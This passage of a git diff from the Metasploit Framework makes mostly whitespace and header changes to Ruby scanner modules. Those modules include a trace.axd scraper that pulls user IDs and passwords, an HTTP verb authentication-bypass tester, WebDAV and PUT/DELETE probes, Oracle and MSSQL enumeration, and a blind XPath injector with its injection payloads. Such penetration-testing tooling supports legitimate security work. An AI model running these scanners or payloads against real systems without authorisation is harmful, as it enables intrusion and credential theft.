http://metasploit.com/framework/ 
@@ -10,9 +14,9 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 # Exploit mixins should be called first
- include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::WMAPScanDir
 # Scanner mixin should be near last
 include Msf::Auxiliary::Scanner
@@ -26,38 +30,38 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => ['c4an'],
 'License' => MSF_LICENSE
 )
- 
+
 register_options(
 [
 OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
- OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
+ OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
 ], self.class)
- 
+
 register_advanced_options(
 [
 OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
 ], self.class)
- end
+ end
- def run_host(target_host)
- tpath = datastore['PATH']
+ def run_host(target_host)
+ tpath = datastore['PATH']
 if tpath[-1,1] != '/'
 tpath += '/'
 end
 begin
 turl = tpath+'trace.axd'
- 
+
 res = send_request_cgi({
- 'uri' => turl,
+ 'uri' => turl,
 'method' => 'GET',
 'version' => '1.0',
 }, 10)
- 
- if res and res.body.include?("<td><h1>Application Trace</h1></td>")
- print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
- 
+
+ if res and res.body.include?("<td><h1>Application Trace</h1></td>")
+ print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
+
 report_note(
 :host => target_host,
 :proto => 'HTTP',
@@ -65,55 +69,55 @@ class Metasploit3 < Msf::Auxiliary
 :type => 'TRACE_AXD',
 :data => "trace.axd"
 )
- 
- if datastore['TRACE_DETAILS']
- aregex = /Trace.axd\?id=\d/
+ if datastore['TRACE_DETAILS']
+
+ aregex = /Trace.axd\?id=\d/
 result = res.body.scan(aregex).uniq
- 
+
 result.each do |u|
 turl = tpath+u.to_s
- 
+
 res = send_request_cgi({
- 'uri' => turl,
+ 'uri' => turl,
 'method' => 'GET',
 'version' => '1.0',
 }, 10)
- 
+
 if res
- reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
+ reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
 /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/, /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
- /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
+ /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
 /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
- ]
+ ]
 print_status ("DETAIL: #{turl}")
 reg_info.each do |reg|
 result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
 str = result.to_s.chomp
- 
- 
- if reg.to_s.include?"APPL_PHYSICAL_PATH"
+
+
+ if reg.to_s.include?"APPL_PHYSICAL_PATH"
 print_status ("Physical Path: #{str}")
 elsif reg.to_s.include?"UserId"
 print_status ("User ID: #{str}")
 elsif reg.to_s.include?"Password"
- print_status ("Password: #{str}")
+ print_status ("Password: #{str}")
 elsif reg.to_s.include?"AspFilterSessionId"
 print_status ("Session ID: #{str}")
- elsif reg.to_s.include?"LOCAL_ADDR"
+ elsif reg.to_s.include?"LOCAL_ADDR"
 print_status ("Local Address: #{str}")
 elsif result.include?"Via"
 print_status ("VIA: #{str}")
- elsif reg.to_s.include?"ALL_RAW"
+ elsif reg.to_s.include?"ALL_RAW"
 print_status ("Headers: #{str}")
 end
 end
- end
- end
+ end
+ end
 end
- end
- 
+ end
+
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 rescue ::Timeout::Error, ::Errno::EPIPE
 end
diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb
index b90fe5b74a..364fa76527 100644
--- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb
@@ -1,6 +1,9 @@
+##
+# $Id$
+##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -11,29 +14,29 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 # Exploit mixins should be called first
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::WMAPScanServer
 # Scanner mixin should be near last
 include Msf::Auxiliary::Scanner
 include Msf::Auxiliary::Report
- 
+
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'HTTP Verb Authentication Bypass Scanner',
 'Description' => %q{
 This module test for authentication bypass using different HTTP verbs.
- 
+
 },
 'Author' => [ 'et [at] metasploit.com' ],
 'License' => BSD_LICENSE,
- 'Version' => '$Revision$'))
- 
+ 'Version' => '$Revision$'))
+
 register_options(
 [
 OptString.new('PATH', [ true, "The path to test", '/'])
- ], self.class)
+ ], self.class)
 end
 # Fingerprint a single host
@@ -43,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
 'HEAD',
 'TRACE',
 'TRACK',
- 'WMAP'
+ 'WMAP'
 ]
@@ -54,12 +57,12 @@ class Metasploit3 < Msf::Auxiliary
 }, 10)
 if res
- 
+
 auth_code = res.code
- 
+
 if res.headers['WWW-Authenticate']
 print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]")
- 
+
 report_note(
 :host => ip,
 :proto => 'HTTP',
@@ -67,18 +70,18 @@ class Metasploit3 < Msf::Auxiliary
 :type => 'WWW_AUTHENTICATE',
 :data => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}"
 )
- 
+
 verbs.each do |tv|
 resauth = send_request_raw({
 'uri' => datastore['PATH'],
 'method' => tv
 }, 10)
- 
- if resauth
+
+ if resauth
 print_status("Testing verb #{tv} resp code: [#{resauth.code}]")
 if resauth.code != auth_code and resauth.code <= 302
 print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}")
- 
+
 report_note(
 :host => ip,
 :proto => 'HTTP',
@@ -88,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
 )
 end
 end
- end
+ end
 else
 print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}")
 end
diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb
index 222a62c3ad..3c063a854f 100644
--- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb
+++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -10,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 # Exploit mixins should be called first
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::WMAPScanServer
@@ -26,14 +30,14 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => ['et'],
 'License' => MSF_LICENSE
 )
- 
+
 end
 def run_host(target_host)
 begin
 res = send_request_cgi({
- 'uri' => '/',
+ 'uri' => '/',
 'method' => 'PROPFIND',
 'data' => '',
 'ctype' => 'text/xml',
@@ -41,19 +45,19 @@ class Metasploit3 < Msf::Auxiliary
 'vhost' => '',
 }, 10)
- 
- if res and res.body
- # short regex
+
+ if res and res.body
+ # short regex
 intipregex = /(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})/i
 #print_status("#{res.body}")
 result = res.body.scan(intipregex).uniq
- 
+
 result.each do |addr|
 print_status("Found internal IP in WebDAV response (#{target_host}) #{addr}")
- 
+
 report_note(
 :host => target_host,
 :proto => 'HTTP',
@@ -62,8 +66,8 @@ class Metasploit3 < Msf::Auxiliary
 :data => "#{addr}"
 )
 end
- end
- 
+ end
+
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 rescue ::Timeout::Error, ::Errno::EPIPE
 end
diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb
index a5ece12c5b..4c43973fe2 100644
--- a/modules/auxiliary/scanner/http/webdav_scanner.rb
+++ b/modules/auxiliary/scanner/http/webdav_scanner.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -10,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 # Exploit mixins should be called first
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::WMAPScanServer
@@ -26,27 +30,27 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => ['et'],
 'License' => MSF_LICENSE
 )
- 
+
 end
 def run_host(target_host)
 begin
 res = send_request_raw({
- 'uri' => '/',
+ 'uri' => '/',
 'method' => 'OPTIONS'
 }, 10)
 if res and res.code == 200
- 
+
 tserver = res.headers['Server']
- 
- if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
+
+ if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
 wdtype = 'WEBDAV'
 if res.headers['X-MSDAVEXT']
 wdtype = 'SHAREPOINT DAV'
- end
- 
+ end
+
 print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
 report_note(
@@ -60,8 +64,8 @@ class Metasploit3 < Msf::Auxiliary
 else
 print_status("#{target_host} (#{tserver}) WebDAV disabled.")
 end
- end
- 
+ end
+
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 rescue ::Timeout::Error, ::Errno::EPIPE
 end
diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb
index b3b5170adb..2b7f8237e2 100644
--- a/modules/auxiliary/scanner/http/webdav_website_content.rb
+++ b/modules/auxiliary/scanner/http/webdav_website_content.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -10,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 # Exploit mixins should be called first
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::WMAPScanServer
@@ -26,14 +30,14 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => ['et'],
 'License' => MSF_LICENSE
 )
- 
+
 end
 def run_host(target_host)
 begin
 res = send_request_cgi({
- 'uri' => '/',
+ 'uri' => '/',
 'method' => 'PROPFIND',
 'data' => '',
 'ctype' => 'text/xml',
@@ -41,19 +45,19 @@ class Metasploit3 < Msf::Auxiliary
 'vhost' => '',
 }, 10)
- 
- if res and res.body
- # short url regex
+
+ if res and res.body
+ # short url regex
 urlregex = /<a:href[^>]*>(.*?)<\/a:href>/i
 #print_status("#{res.body}")
 result = res.body.scan(urlregex).uniq
- 
+
 result.each do |u|
 print_status("Found file or directory in WebDAV response (#{target_host}) #{u}")
- 
+
 report_note(
 :host => target_host,
 :proto => 'HTTP',
@@ -61,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary
 :type => 'WEBDAV_FILE_DIRECTORY',
 :data => "#{u}"
 )
- 
+
 end
- end
- 
+ end
+
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 rescue ::Timeout::Error, ::Errno::EPIPE
 end
diff --git a/modules/auxiliary/scanner/http/writable.rb b/modules/auxiliary/scanner/http/writable.rb
index 0d4d39439b..58d931752a 100644
--- a/modules/auxiliary/scanner/http/writable.rb
+++ b/modules/auxiliary/scanner/http/writable.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -14,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 # Exploit mixins should be called first
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::WMAPScanDir
@@ -39,9 +39,9 @@ class Metasploit3 < Msf::Auxiliary
 ['PUT'],
 ['DELETE']
 ],
- 'DefaultAction' => 'PUT'
+ 'DefaultAction' => 'PUT'
 )
- 
+
 register_options(
 [
 OptString.new('PATH', [ true, "The path to attempt to write or delete", '/http_write.txt']),
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
 target_host = ip
 target_port = datastore['RPORT']
- 
+
 case action.name
 when 'PUT'
 begin
@@ -67,11 +67,11 @@ class Metasploit3 < Msf::Auxiliary
 return if not res
 if (res and res.code >= 200 and res.code < 300)
- 
+
 #
 # Detect if file was really uploaded
- #
- 
+ #
+
 begin
 res = send_request_cgi({
 'uri' => datastore['PATH'],
@@ -80,13 +80,13 @@ class Metasploit3 < Msf::Auxiliary
 }, 20)
 return if not res
- 
- tcode = res.code.to_i
+
+ tcode = res.code.to_i
 if res and (tcode >= 200 and tcode <= 299)
 if res.body.include? datastore['DATA']
 print_status("Upload succeeded on #{wmap_base_url}#{datastore['PATH']} [#{res.code}]")
- 
+
 report_note(
 :host => ip,
 :proto => 'HTTP',
@@ -94,23 +94,23 @@ class Metasploit3 < Msf::Auxiliary
 :type => 'PUT_ENABLED',
 :data => "#{datastore['PATH']}"
 )
- 
+
 end
 else
 print_status("Received a #{tcode} code but upload failed on #{wmap_base_url} [#{res.code} #{res.message}]")
 end
- 
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- rescue ::Timeout::Error, ::Errno::EPIPE
- end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
 else
 print_status("Upload failed on #{wmap_base_url} [#{res.code} #{res.message}]")
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- rescue ::Timeout::Error, ::Errno::EPIPE
+ rescue ::Timeout::Error, ::Errno::EPIPE
 end
- 
+
 when 'DELETE'
 begin
 res = send_request_cgi({
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
 return if not res
 if (res and res.code >= 200 and res.code < 300)
 print_status("Delete succeeded on #{wmap_base_url}#{datastore['PATH']} [#{res.code}]")
- 
+
 report_note(
 :host => ip,
 :proto => 'HTTP',
@@ -129,14 +129,14 @@ class Metasploit3 < Msf::Auxiliary
 :type => 'DELETE_ENABLED',
 :data => "#{datastore['PATH']}"
 )
- 
+
 else
 print_status("Delete failed on #{wmap_base_url} [#{res.code} #{res.message}]")
 end
 rescue ::Rex::ConnectionError
- rescue ::Timeout::Error, ::Errno::EPIPE
- end
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
 end
 end
diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb
index bd08742a5e..aa9d81381a 100644
--- a/modules/auxiliary/scanner/http/xpath.rb
+++ b/modules/auxiliary/scanner/http/xpath.rb
@@ -1,6 +1,9 @@
+##
+# $Id$
+##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -17,15 +20,15 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Auxiliary::Scanner
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'HTTP Blind XPATH 1.0 Injector',
 'Description' => %q{
 This module exploits blind XPATH 1.0 injections over HTTP GET requests.
 },
 'Author' => [ 'et [at] metasploit . com' ],
 'License' => BSD_LICENSE,
- 'Version' => '$Revision$'))
- 
+ 'Version' => '$Revision$'))
+
 register_options(
 [
 OptString.new('METHOD', [ true, "HTTP Method",'GET']),
@@ -38,46 +41,46 @@ class Metasploit3 < Msf::Auxiliary
 OptBool.new('MAX_OVER', [ true, "Dont detect result size. Use MAX_LEN instead", true ]),
 OptBool.new('CHKINJ', [ false, "Check XPath injection with error message", false ]),
 OptBool.new('DEBUG_INJ', [ false, "Debug XPath injection", true ])
- ], self.class)
- 
+ ], self.class)
+
 end
- 
+
 def wmap_enabled
 false
 end
 def run_host(ip)
- 
+
 #
 # Max string len
 #
 maxstr = datastore['MAX_LEN']
- 
+
 conn = true
- 
+
 rnum=rand(10000)
- 
+
 # Weird crap only lower case 'and' operand works
 truecond = "'%20and%20'#{rnum}'='#{rnum}"
- falsecond = "'%20and%20'#{rnum}'='#{rnum+1}"
- 
+ falsecond = "'%20and%20'#{rnum}'='#{rnum+1}"
+
 hmeth = datastore['METHOD']
 tpath = datastore['PATH']
 prequery = datastore['PRE_QUERY']
 postquery = datastore['POST_QUERY']
 emesg = datastore['ERROR_MSG']
 xcomm = datastore['XCOMMAND']
- 
- 
- 
- print_status("Initializing injection.")
- 
+
+
+
+ print_status("Initializing injection.")
+
 if datastore['CHKINJ']
- 
+
 #
 # Detect error msg in true condition
- #
- 
+ #
+
 begin
 res = send_request_cgi({
 'uri' => tpath,
@@ -86,22 +89,22 @@ class Metasploit3 < Msf::Auxiliary
 }, 20)
 return if not res
- 
- if res.body.index(emesg)
+
+ if res.body.index(emesg)
 print_status("False statement check done.")
 else
 print_error("Error message not included in false condition.")
 return
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- conn = false
- rescue ::Timeout::Error, ::Errno::EPIPE
+ conn = false
+ rescue ::Timeout::Error, ::Errno::EPIPE
 end
- 
+
 #
 # Detect error msg in false condition
- #
- 
+ #
+
 begin
 res = send_request_cgi({
 'uri' => tpath,
@@ -109,44 +112,44 @@ class Metasploit3 < Msf::Auxiliary
 'method' => hmeth
 }, 20)
- return if not res
- 
- if res.body.index(emesg)
+ return if not res
+
+ if res.body.index(emesg)
 print_error("Error message included in true condition.")
 return
 else
 print_status("True statement check done.")
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- conn = false
- rescue ::Timeout::Error, ::Errno::EPIPE
- end
+ conn = false
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
 return if not conn
- end
- 
+ end
+
 #
 # Find length of command result
 #
 low = 1
 high = maxstr
- 
+
 if datastore['MAX_OVER']
 print_status("Max. limit set to #{maxstr} characters")
 reslen = maxstr
- else
- lenfound = false
+ else
+ lenfound = false
- while !lenfound do
+ while !lenfound do
 middle = (low + high) / 2;
- 
+
 if datastore['DEBUG_INJ']
- print_status("Lenght Low: #{low} High: #{high} Med: #{middle}")
+ print_status("Lenght Low: #{low} High: #{high} Med: #{middle}")
 end
- 
+
 injlen = "'%20and%20string-length(#{xcomm})=#{middle}%20and%20'#{rnum}'='#{rnum}"
- 
+
 begin
 res = send_request_cgi({
 'uri' => tpath,
@@ -154,23 +157,23 @@ class Metasploit3 < Msf::Auxiliary
 'method' => hmeth
 }, 20)
- return if not res
- 
- if res.body.index(emesg)
- lenf = false
+ return if not res
+
+ if res.body.index(emesg)
+ lenf = false
 else
 lenfound = true
 lenf = true
 lens = middle
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- conn = false
- rescue ::Timeout::Error, ::Errno::EPIPE
+ conn = false
+ rescue ::Timeout::Error, ::Errno::EPIPE
 end
- 
+
 if !lenf
 injlen = "'%20and%20string-length(#{xcomm})<#{middle}%20and%20'#{rnum}'='#{rnum}"
- 
+
 begin
 res = send_request_cgi({
 'uri' => tpath,
@@ -178,20 +181,20 @@ class Metasploit3 < Msf::Auxiliary
 'method' => hmeth
 }, 20)
- return if not res
- 
- if res.body.index(emesg)
- low = middle
+ return if not res
+
+ if res.body.index(emesg)
+ low = middle
 else
 high = middle
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- conn = false
- rescue ::Timeout::Error, ::Errno::EPIPE
- end
+ conn = false
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
 end
- end
- 
+ end
+
 print_status("Result size: #{lens}")
 reslen = lens.to_i
 end
@@ -199,24 +202,24 @@ class Metasploit3 < Msf::Auxiliary
 #
 # Execute xpath command and guess response
 #
- 
- namestr = []
- numchr = 0
- for i in (1..reslen)
+ namestr = []
+ numchr = 0
+
+ for i in (1..reslen)
 #
 # Only alpha range
 #
 for k in (32..126)
 j = "%"+("%x" % k)
- 
- # For Xpath 2.0 Blind search may be performed using a fast binary search using the
+
+ # For Xpath 2.0 Blind search may be performed using a fast binary search using the
 # string-to-codepoints(string) function
- # injlen = "'%20and%20string-to-codepoints(substring(#{xcomm},#{i},1))<#{k}%20and%20'#{rnum}'='#{rnum}"
+ # injlen = "'%20and%20string-to-codepoints(substring(#{xcomm},#{i},1))<#{k}%20and%20'#{rnum}'='#{rnum}"
 # Basic Blind XPath 1.0 Injection
 injlen = "'%20and%20substring(#{xcomm},#{i},1)=\"#{j}\"%20and%20'#{rnum}'='#{rnum}"
- 
+
 begin
 res = send_request_cgi({
 'uri' => tpath,
@@ -224,36 +227,36 @@ class Metasploit3 < Msf::Auxiliary
 'method' => hmeth
 }, 20)
- return if not res
- 
- if res.body.index(emesg)
- # neeeeext
+ return if not res
+
+ if res.body.index(emesg)
+ # neeeeext
 else
 if(numchr >= maxstr) # maximum limit reached
- print_status("#{xcomm}: #{namestr}")
+ print_status("#{xcomm}: #{namestr}")
 print_status("Maximum string length reached.")
- return
+ return
 end
- 
+
 numchr+=1
- 
+
 comperc = (numchr * 100) / maxstr
- 
+
 namestr << "#{k.chr}"
 if datastore['DEBUG_INJ']
 print_status("#{comperc}%: '#{k.chr}' #{namestr}")
- end
+ end
 break
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- conn = false
- rescue ::Timeout::Error, ::Errno::EPIPE
+ conn = false
+ rescue ::Timeout::Error, ::Errno::EPIPE
 end
 end
 end
- 
- print_status("#{xcomm}: #{namestr}")
+
+ print_status("#{xcomm}: #{namestr}")
 print_status("Done.")
 end
 end
diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb
index c937a0ef00..7cce0e8ba1 100644
--- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb
+++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
 'Version' => '$Revision$',
 'DisclosureDate' => 'Sep 25 2009'))
- register_options([Opt::RPORT(407),], self.class)
+ register_options([Opt::RPORT(407),], self.class)
 deregister_options('RHOST')
 end
@@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
 ping = "\x00\x25\x00\x22\xFF\x01\x00\x64\x03\x07\x00\x05\x00\x01\x00\x00"
 udp_sock.write(ping)
- 
+
 res = udp_sock.read(256)
- 
+
 if ( res =~ /\x00\x25\xD0\xB9/ )
 report_note(
 :host => ip,
@@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 print_error("Unable to determine info for #{ip}...")
 end
 disconnect_udp
- rescue ::Errno::EPIPE, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
+ rescue ::Errno::EPIPE, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
 end
 end
 end
diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb
index c2668dc481..7bce8f8c1a 100644
--- a/modules/auxiliary/scanner/mssql/mssql_ping.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -14,11 +14,11 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- 
+
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Scanner
 include Msf::Auxiliary::Report
- 
+
 def initialize
 super(
 'Name' => 'MSSQL Ping Utility',
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => 'MC',
 'License' => MSF_LICENSE
 )
- 
+
 deregister_options('RPORT', 'RHOST')
 end
@@ -36,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary
 end
 def run_host(ip)
- 
+
 begin
- 
+
 info = mssql_ping(2)
 if (info['ServerName'])
 print_status("SQL Server information for #{ip}:")
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
 end
- 
+
 rescue ::Rex::ConnectionError
 end
 end
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
 :name => "mssql",
 :info => mssql_info,
 :state => mssql_tcp_state
- )
+ )
 end
 end
diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb
index c3fc27fa2c..e10ff3a272 100644
--- a/modules/auxiliary/scanner/mysql/mysql_version.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_version.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb
index 31c5b7caf5..a60aecc283 100644
--- a/modules/auxiliary/scanner/oracle/emc_sid.rb
+++ b/modules/auxiliary/scanner/oracle/emc_sid.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -9,7 +13,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Report
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner
@@ -38,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 'uri' => '/em/console/logon/logon',
 'method' => 'GET',
 }, 5)
- 
+
 if (res.code == 200)
 sid = res.body.scan(/Login to Database:(\w+)/)
 report_note(
@@ -53,6 +57,6 @@ class Metasploit3 < Msf::Auxiliary
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 rescue ::Timeout::Error, ::Errno::EPIPE
- end
+ end
 end
 end
diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb
index 70f111a556..049a0a737a 100644
--- a/modules/auxiliary/scanner/oracle/sid_enum.rb
+++ b/modules/auxiliary/scanner/oracle/sid_enum.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -17,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
 super(update_info(info,
 'Name' => 'Oracle SID Enumeration.',
 'Description' => %q{
- This module simply queries the TNS listner for the Oracle SID.
- With Oracle 9.2.0.8 and above the listener will be protected and
+ This module simply queries the TNS listner for the Oracle SID.
+ With Oracle 9.2.0.8 and above the listener will be protected and
 the SID will have to be bruteforced or guessed.
 },
 'Author' => [ 'CG', 'MC' ],
@@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
 'Version' => '$Revision$',
 'DisclosureDate' => 'Jan 7 2009'))
- register_options([Opt::RPORT(1521),], self.class)
+ register_options([Opt::RPORT(1521),], self.class)
 deregister_options('RHOST')
 end
@@ -38,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 pkt = tns_packet("(CONNECT_DATA=(COMMAND=STATUS))")
 sock.put(pkt)
- 
+
 sleep(0.5)
 data = sock.get_once
diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb
index 76e75bd86e..21df12a169 100644
--- a/modules/auxiliary/scanner/oracle/spy_sid.rb
+++ b/modules/auxiliary/scanner/oracle/spy_sid.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
